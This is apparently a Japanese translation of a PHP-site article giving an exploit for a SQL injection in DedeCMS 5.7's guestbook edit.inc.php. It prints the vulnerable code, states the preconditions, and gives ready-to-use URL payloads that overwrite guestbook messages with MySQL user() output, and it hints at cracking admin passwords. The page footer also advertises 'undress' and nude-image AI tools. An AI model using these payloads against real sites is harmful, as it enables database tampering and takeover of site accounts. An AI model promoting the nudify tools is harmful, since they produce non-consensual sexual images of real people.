dedecms5.7 の最新 SQL が guestbook.php インジェクションの脆弱性を悪用
この記事の内容は、guestbook.php を使用した dedecms5.7 の最新の SQL インジェクションの脆弱性に関するものです。必要な方は参考にしてください。
影響を受けるバージョンは 5.7 です。脆弱性ファイル edit.inc .php 固有のコード:
< ?php
if(!defined('DEDEINC')) exit('Request Error!');
if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";
$id = intval($id);
if(empty($job)) $job='view';
if($job=='del' && $g_isadmin)
{
$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");
ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS);
exit();
}
else if($job=='check' && $g_isadmin)
{
$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS);
exit();
}
else if($job=='editok')
{
$remsg = trim($remsg);
if($remsg!='')
{
//管理员回复不过滤HTML By:Errorera blog:errs.cc
if($g_isadmin)
{
$msg = "<p class='rebox'>".$msg."</p>\n".$remsg;
//$remsg <br /><font color=red>管理员回复:</font> }
else
{
$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");
$oldmsg = "<p class='rebox'>".addslashes($row['msg'])."</p>\n";
$remsg = trimMsg(cn_substrR($remsg, 1024), 1);
$msg = $oldmsg.$remsg;
}
}
//这里没有对$msg过滤,导致可以任意注入了By:Errorera home:www.errs.cc
$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);
exit();
}
//home:www.errs.cc
if($g_isadmin)
{
$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");
require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");
require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}脆弱性が成功するための要件:
1. php magic_quotes_gpc=off2. 脆弱性ファイルが存在する plus/guestbook.php dede_guestbook テーブルも存在する必要があります。
脆弱性があるかどうかの判断方法:
次に、[返信/編集] にマウスを置くと ID が表示されます。他の人のメッセージの。次にIDをメモします
Visit:
www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID
送信後、dede5.7バージョンの場合は「変更が成功したか、メッセージに返信されました」と表示され、変更が成功したことが証明されますwww.xxx.comに戻ります/plus/guestbook.php 変更したメッセージ ID が errs.cc になっているかどうかを確認します
そうであれば、脆弱性が悪用できないことが証明されており、php magic_quotes_gpc=off をオンにする必要があります
変更が次の場合成功しませんでした。メッセージ ID の内容はまだです。前のメッセージは、この脆弱性が悪用できることを証明しました。
再度アクセスしてwww.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='
して戻ってくると、メッセージIDの内容が直接mysql user()に変更されます。
おそらくこんな感じの使い方だと思いますので、興味のある方はぜひ勉強してみてください! !
最後に、管理バックエンドアカウントのパスワードを破る方法について言う人もいるかもしれませんが、それは自分で調べればわかります。とにかく絶対バレる(バレないなら載せない)! !
りー
以上がdedecms5.7 の最新 SQL が guestbook.php インジェクションの脆弱性を悪用の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
AI Hentai Generator
AIヘンタイを無料で生成します。
人気の記事
ホットツール
メモ帳++7.3.1
使いやすく無料のコードエディター
SublimeText3 中国語版
中国語版、とても使いやすい
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
ドリームウィーバー CS6
ビジュアル Web 開発ツール
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
ホットトピック
Ubuntu および Debian 用の PHP 8.4 インストールおよびアップグレード ガイド
Dec 24, 2024 pm 04:42 PM
PHP 8.4 では、いくつかの新機能、セキュリティの改善、パフォーマンスの改善が行われ、かなりの量の機能の非推奨と削除が行われています。 このガイドでは、Ubuntu、Debian、またはその派生版に PHP 8.4 をインストールする方法、または PHP 8.4 にアップグレードする方法について説明します。
CakePHP ファイルのアップロード
Sep 10, 2024 pm 05:27 PM
ファイルのアップロードを行うには、フォーム ヘルパーを使用します。ここではファイルアップロードの例を示します。
CakePHP データベースの操作
Sep 10, 2024 pm 05:25 PM
CakePHP でデータベースを操作するのは非常に簡単です。この章では、CRUD (作成、読み取り、更新、削除) 操作について理解します。
CakePHP について話し合う
Sep 10, 2024 pm 05:28 PM
CakePHP は、PHP 用のオープンソース フレームワークです。これは、アプリケーションの開発、展開、保守をより簡単にすることを目的としています。 CakePHP は、強力かつ理解しやすい MVC のようなアーキテクチャに基づいています。モデル、ビュー、コントローラー
